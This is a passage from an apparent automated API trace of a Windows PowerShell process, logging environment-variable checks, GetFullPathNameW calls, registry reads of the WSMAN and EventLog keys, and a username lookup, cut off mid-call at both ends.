lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0085.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0085.684] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0085.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0085.685] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0085.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0085.686] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0085.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0085.687] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0085.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0085.698] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0085.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0085.698] CoTaskMemFree (pv=0x1f7740) [0085.702] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0085.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0085.703] CoTaskMemFree (pv=0x1f7740) [0085.703] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0085.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0085.703] CoTaskMemFree (pv=0x1f7740) [0085.712] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x308) returned 0x0 [0085.714] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed21c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed218, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed21c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed218*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.714] CoTaskMemFree (pv=0x0) [0085.714] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x1cf5e0, lpcchValueName=0xed2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xed2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0085.714] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x1cf5e0, lpcchValueName=0xed2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xed2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0085.714] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x1cf5e0, lpcchValueName=0xed2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xed2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0085.714] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed2ac, lpData=0x0, lpcbData=0xed2a8*=0x0 | out: lpType=0xed2ac*=0x1, lpData=0x0, lpcbData=0xed2a8*=0x8) returned 0x0 [0085.714] CoTaskMemAlloc (cb=0xc) returned 0x1b270890 [0085.714] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed27c, lpData=0x1b270890, lpcbData=0xed278*=0x8 | out: lpType=0xed27c*=0x1, lpData="2.0", lpcbData=0xed278*=0x8) returned 0x0 [0085.759] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xed268 | out: phkResult=0xed268*=0x30c) returned 0x0 [0085.759] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed16c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed168*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.760] CoTaskMemFree (pv=0x0) [0085.760] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.760] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x1cf5e0, lpcchValueName=0xed218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xed218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0085.760] CoTaskMemFree (pv=0x1cf5e0) [0085.760] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.760] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x1cf5e0, lpcchValueName=0xed218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xed218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0085.760] CoTaskMemFree (pv=0x1cf5e0) [0085.760] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.760] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x1cf5e0, lpcchValueName=0xed218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xed218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0085.760] CoTaskMemFree (pv=0x1cf5e0) [0085.760] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed1fc, lpData=0x0, lpcbData=0xed1f8*=0x0 | out: lpType=0xed1fc*=0x1, lpData=0x0, lpcbData=0xed1f8*=0x8) returned 0x0 [0085.760] CoTaskMemAlloc (cb=0xc) returned 0x1b270b50 [0085.760] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed1cc, lpData=0x1b270b50, lpcbData=0xed1c8*=0x8 | out: lpType=0xed1cc*=0x1, lpData="2.0", lpcbData=0xed1c8*=0x8) returned 0x0 [0085.760] CoTaskMemFree (pv=0x1b270b50) [0085.761] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0085.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0085.761] CoTaskMemFree (pv=0x1f7740) [0085.767] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0085.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0085.767] CoTaskMemFree (pv=0x1f7740) [0085.776] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x310) returned 0x0 [0085.778] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed20c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed208, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed20c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed208*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.779] CoTaskMemFree (pv=0x0) [0085.779] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.779] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x0, lpName=0x1cf5e0, lpcchName=0xed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.779] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1, lpName=0x1cf5e0, lpcchName=0xed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.779] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x2, lpName=0x1cf5e0, lpcchName=0xed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.780] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x3, lpName=0x1cf5e0, lpcchName=0xed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.780] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x4, lpName=0x1cf5e0, lpcchName=0xed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.780] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x5, lpName=0x1cf5e0, lpcchName=0xed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.780] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x6, lpName=0x1cf5e0, lpcchName=0xed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.780] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x7, lpName=0x1cf5e0, lpcchName=0xed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.780] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x8, lpName=0x1cf5e0, lpcchName=0xed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.780] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x324) returned 0x0 [0085.780] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x0) returned 0x2 [0085.780] RegOpenKeyExW (in: hKey=0x310, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x334) returned 0x0 [0085.780] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x0) returned 0x2 [0085.780] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x338) returned 0x0 [0085.780] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x0) returned 0x2 [0085.781] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x33c) returned 0x0 [0085.781] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x0) returned 0x2 [0085.781] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x340) returned 0x0 [0085.781] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x0) returned 0x2 [0085.781] RegOpenKeyExW (in: hKey=0x310, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x344) returned 0x0 [0085.781] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x0) returned 0x2 [0085.781] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x0) returned 0x5 [0085.847] RegOpenKeyExW (in: hKey=0x310, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x348) returned 0x0 [0085.847] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x0) returned 0x2 [0085.847] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x34c) returned 0x0 [0085.847] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2f8 | out: phkResult=0xed2f8*=0x350) returned 0x0 [0085.847] RegCloseKey (hKey=0x350) returned 0x0 [0085.847] RegCloseKey (hKey=0x310) returned 0x0 [0085.848] RegCloseKey (hKey=0x34c) returned 0x0 [0085.917] CoTaskMemAlloc (cb=0x804) returned 0x1b2a38a0 [0085.918] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b2a38a0, nSize=0xed508 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed508) returned 0x1 [0085.919] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.919] GetUserNameW (in: lpBuffer=0x1cf5e0, pcbBuffer=0xed548 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed548) returned 1 [0085.920] CoTaskMemFree (pv=0x1cf5e0) [0085.984] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x354) returned 0x0 [0085.984] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.984] CoTaskMemFree (pv=0x0) [0085.984] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.984] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.984] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.984] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.984] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.984] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.984] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.984] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.984] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.984] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.985] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x358) returned 0x0 [0085.985] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.985] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x35c) returned 0x0 [0085.985] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.985] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x360) returned 0x0 [0085.985] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.985] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x364) returned 0x0 [0085.985] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.985] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x368) returned 0x0 [0085.985] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.985] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x36c) returned 0x0 [0085.986] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.986] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x5 [0085.996] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x370) returned 0x0 [0085.996] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.996] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x374) returned 0x0 [0085.996] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x378) returned 0x0 [0085.996] RegCloseKey (hKey=0x378) returned 0x0 [0085.996] RegCloseKey (hKey=0x354) returned 0x0 [0085.997] RegCloseKey (hKey=0x374) returned 0x0 [0085.997] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed248 | out: phkResult=0xed248*=0x374) returned 0x0 [0085.997] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.997] CoTaskMemFree (pv=0x0) [0085.997] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.997] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.997] CoTaskMemFree (pv=0x1cf5e0) [0085.998] CoTaskMemFree (pv=0x0) [0085.998] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.998] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.998] CoTaskMemFree (pv=0x1cf5e0) [0085.998] CoTaskMemFree (pv=0x0) [0085.998] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.998] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.998] CoTaskMemFree (pv=0x1cf5e0) [0085.998] CoTaskMemFree (pv=0x0) [0085.998] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.998] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.998] CoTaskMemFree (pv=0x1cf5e0) [0085.998] CoTaskMemFree (pv=0x0) [0085.998] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.998] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.998] CoTaskMemFree (pv=0x1cf5e0) [0085.998] CoTaskMemFree (pv=0x0) [0085.998] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.998] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.998] CoTaskMemFree (pv=0x1cf5e0) [0085.998] CoTaskMemFree (pv=0x0) [0085.998] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.998] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.998] CoTaskMemFree (pv=0x1cf5e0) [0085.998] CoTaskMemFree (pv=0x0) [0085.998] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.998] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x1cf5e0, lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.999] CoTaskMemFree (pv=0x1cf5e0) [0085.999] CoTaskMemFree (pv=0x0) [0085.999] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0085.999] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x1cf5e0, 